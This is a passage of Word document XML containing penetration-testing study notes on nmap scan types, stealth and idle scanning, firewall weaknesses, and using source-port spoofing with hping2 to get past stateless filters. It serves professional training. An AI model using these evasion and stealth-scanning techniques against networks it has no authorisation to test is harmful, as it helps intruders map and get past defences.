          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>checks echo, daytime, chargen, dns,tftp,ns-netbios,snmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039512C" w:rsidRDefault="0039512C" w:rsidP="008B4568">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0039512C" w:rsidRPr="0039512C" w:rsidRDefault="0039512C" w:rsidP="008B4568">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039512C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Protocol scans:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D31F27" w:rsidRPr="0039512C" w:rsidRDefault="0039512C" w:rsidP="0039512C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0039512C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0039512C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t xml:space="preserve"> –s0 &lt;hosts&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00A331E7" w:rsidRPr="0039512C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039512C" w:rsidRDefault="0039512C" w:rsidP="008B4568">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E9409A" w:rsidRDefault="00A331E7" w:rsidP="00E9409A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A331E7">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidR="008B4568" w:rsidRPr="00A331E7">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> scans</w:t>
      </w:r>
      <w:r w:rsidRPr="00A331E7">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B4568" w:rsidRPr="00E9409A" w:rsidRDefault="00E9409A" w:rsidP="00E9409A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E9409A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00885520" w:rsidRPr="00E9409A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B4568" w:rsidRPr="00E50EC3" w:rsidRDefault="00A331E7" w:rsidP="00A331E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>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-sS  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>default syn scan of 1000 common ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9409A" w:rsidRPr="00E50EC3" w:rsidRDefault="00E9409A"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-p-</w:t>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>all ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A331E7" w:rsidRPr="00E50EC3" w:rsidRDefault="00A331E7"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-sT</w:t>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>connect scan (slower, noiser, can break crap services)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E658EC" w:rsidRPr="00E50EC3" w:rsidRDefault="00A331E7"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-sV</w:t>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>service detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E658EC" w:rsidRDefault="00E658EC">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00945E7A" w:rsidRPr="00945E7A" w:rsidRDefault="00945E7A">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00945E7A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TCP Scanning techniques:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F16048" w:rsidRPr="00945E7A" w:rsidRDefault="00F16048" w:rsidP="00945E7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="357" w:hanging="357"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SYN SCAN - SYN scan is relatively unobtrusive</w:t>
      </w:r>
      <w:r w:rsidR="00764B4F" w:rsidRPr="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, fast,</w:t>
      </w:r>
      <w:r w:rsidRPr="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and stealthy, since it never completes TCP connections</w:t>
      </w:r>
      <w:r w:rsidR="00764B4F" w:rsidRPr="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. T</w:t>
      </w:r>
      <w:r w:rsidRPr="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>his technique is often referred to as half-open scanning, because you don't open a full TCP connection. You send a SYN packet, as if you are going to open a real connection and then wait for a response. A SYN/ACK indicates the port is listening (open), while a RST (reset) is indicative of a non-listener. If no response is received after several retransmissions, the port is marked as filtered. The port is also marked filtered if an ICMP unreachable error (type 3, code 1, 2, 3, 9, 10, or 13) is received.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00764B4F" w:rsidRPr="00945E7A" w:rsidRDefault="00764B4F" w:rsidP="00945E7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="357" w:hanging="357"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Connect scan - accurate but slower and no form of stealth as a full tcp connection is established. Can break poor </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tcp/ip</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> stacks due to large number of open connection with no valid data received on them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00945E7A" w:rsidRPr="00945E7A" w:rsidRDefault="00764B4F" w:rsidP="00945E7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="357" w:hanging="357"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TCP NULL, FIN, and Xmas scans [FIN + PSH + URG</w:t>
      </w:r>
      <w:r w:rsidR="00293F0F" w:rsidRPr="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>] (-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00293F0F" w:rsidRPr="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sN</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00293F0F" w:rsidRPr="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>; -sF; -sX)</w:t>
      </w:r>
      <w:r w:rsidRPr="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> – exploits a loop home in the TCP rfc (793) where if a port is closed you send a RST packet if the packet does not contain SYN, ACK, or RST. Only works on </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> varients as windows, CISCO, IBM do not follow the RFC. If a RST packet is received, the port is considered closed, while no response means it is open|filtered. The port is marked filtered if an ICMP unreachable error (type 3, code 1, 2, 3, 9, 10, or 13) is received. Sometimes good for firewall/IDS evasion but cannot distinguish between open and filtered ports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00293F0F" w:rsidRPr="00945E7A" w:rsidRDefault="00293F0F" w:rsidP="00945E7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="357" w:hanging="357"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ACK scan (-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sA</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) – Stealth and can used to map out firewall rulesets. Open and closed ports return a RST (or ICMP error) other ports are classed as filtered.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00293F0F" w:rsidRPr="00945E7A" w:rsidRDefault="00C02D29" w:rsidP="00945E7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="357" w:hanging="357"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Window</w:t>
      </w:r>
      <w:r w:rsidR="00293F0F" w:rsidRPr="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Scans (-sW) – detects the TCP window size value to determine if the port is open or closed. When it receives a RST back, Window scan lists the port as open or closed if the TCP Window value in that reset is positive or zero, respectively. </w:t>
      </w:r>
      <w:r w:rsidR="00945E7A" w:rsidRPr="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>This scan is n</w:t>
      </w:r>
      <w:r w:rsidRPr="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ot very reliable as only a small number of implantations</w:t>
      </w:r>
      <w:r w:rsidR="00945E7A" w:rsidRPr="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">behave this way. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00945E7A" w:rsidRPr="00945E7A" w:rsidRDefault="00945E7A" w:rsidP="00945E7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="357" w:hanging="357"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Idle scan (–sI) – use a zombie host to scan for you based on analysing the IP ID values on hosts with predictable IPIDs. Very stealthy and can reach targets that are trusted by the zombie host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00945E7A" w:rsidRPr="005861E1" w:rsidRDefault="00945E7A" w:rsidP="00764B4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="357" w:hanging="357"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>FTP bounce scan (-b) – exploits old and weak FTP servers that allow the FTP PORT command. You ask the FTP server to send to another hosts and port and the response message received determines its state.  Stealthy and can abuse trust relations but unlikely to work these days.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0017345B" w:rsidRDefault="0017345B" w:rsidP="0017345B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B5 - </w:t>
      </w:r>
      <w:r w:rsidRPr="0017345B">
        <w:t>Interpreting Tool Output</w:t>
      </w:r>
      <w:r w:rsidRPr="0017345B">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0017345B" w:rsidRDefault="0017345B" w:rsidP="005861E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B5a - </w:t>
      </w:r>
      <w:r w:rsidRPr="0017345B">
        <w:t xml:space="preserve">Interpreting output from port scanners, network sniffers and </w:t>
      </w:r>
      <w:r>
        <w:t>other network enumeration tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0017345B" w:rsidRDefault="0017345B" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[Practical knowledge and experience] </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0017345B" w:rsidRDefault="0017345B" w:rsidP="0017345B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B6 - </w:t>
      </w:r>
      <w:r w:rsidRPr="0017345B">
        <w:t>Filtering Avoidance Techniques</w:t>
      </w:r>
      <w:r w:rsidRPr="0017345B">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0017345B" w:rsidRPr="002753E2" w:rsidRDefault="0017345B" w:rsidP="002753E2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B6a - </w:t>
      </w:r>
      <w:r w:rsidRPr="0017345B">
        <w:t>The importance of egress and ingress filtering, including the risks assoc</w:t>
      </w:r>
      <w:r>
        <w:t>iated with outbound connections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0017345B" w:rsidRDefault="005C2192" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Filtering network traffic to permit only the host requiring access </w:t>
      </w:r>
      <w:r w:rsidR="001E7137">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">to specific services </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>significantly reduces the risk off attack.</w:t>
      </w:r>
      <w:r w:rsidR="00945E7A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Allowing outbound connections can </w:t>
      </w:r>
      <w:r w:rsidR="00DE4D18">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>result in unwanted traffic being let into the network:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE4D18" w:rsidRDefault="00DE4D18" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DE4D18" w:rsidRPr="00DE4D18" w:rsidRDefault="00DE4D18" w:rsidP="00DE4D18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE4D18">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Inbound packets that are not SYNs defeat some firewalls.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE4D18" w:rsidRPr="00DE4D18" w:rsidRDefault="00DE4D18" w:rsidP="00DE4D18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE4D18">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Specific source ports can be allowed in if the firewall is purely configured.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE4D18" w:rsidRPr="00DE4D18" w:rsidRDefault="00DE4D18" w:rsidP="00DE4D18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE4D18">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hi</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE4D18">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>jacking into an outbound connection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0017345B" w:rsidRPr="002753E2" w:rsidRDefault="00DE4D18" w:rsidP="0017345B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE4D18">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Spoofed SRC address can get passed firewall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0017345B" w:rsidRPr="0017345B" w:rsidRDefault="0017345B" w:rsidP="0017345B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B7 - </w:t>
      </w:r>
      <w:r w:rsidRPr="0017345B">
        <w:t>Packet Crafting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0017345B" w:rsidRPr="0017345B" w:rsidRDefault="0017345B" w:rsidP="0017345B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B7a - </w:t>
      </w:r>
      <w:r w:rsidRPr="0017345B">
        <w:t>Packet crafting to meet a particular requirement:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9409A" w:rsidRDefault="0017345B" w:rsidP="00E9409A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017345B">
        <w:t>Modifying source ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9409A" w:rsidRDefault="00E9409A" w:rsidP="00E9409A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9409A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Many tools allow modification of source ports which is useful to bypass network filtering when the firewall used stateless mechanisms. For example to allow internal users to browse the web UDP port 53 and TCP ports 80 and 443 are let into the network. Setting the source port to any of these commonly allowed protocols can bypass the firewall and allow packets to get into the network.  </w:t>
      </w:r>
      <w:r w:rsidR="00DE4D18">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FTP is another good example due to the way it can connect back via </w:t>
      </w:r>
      <w:r w:rsidR="007F5B84">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SRC </w:t>
      </w:r>
      <w:r w:rsidR="00DE4D18">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>port 20.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5B84" w:rsidRDefault="007F5B84" w:rsidP="007F5B84">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="357"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007F5B84" w:rsidRPr="00E301A8" w:rsidRDefault="007F5B84" w:rsidP="007F5B84">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7F5B84" w:rsidRPr="00E50EC3" w:rsidRDefault="007F5B84" w:rsidP="007F5B84">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t xml:space="preserve">hping2 -s | --baseport &lt;port&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
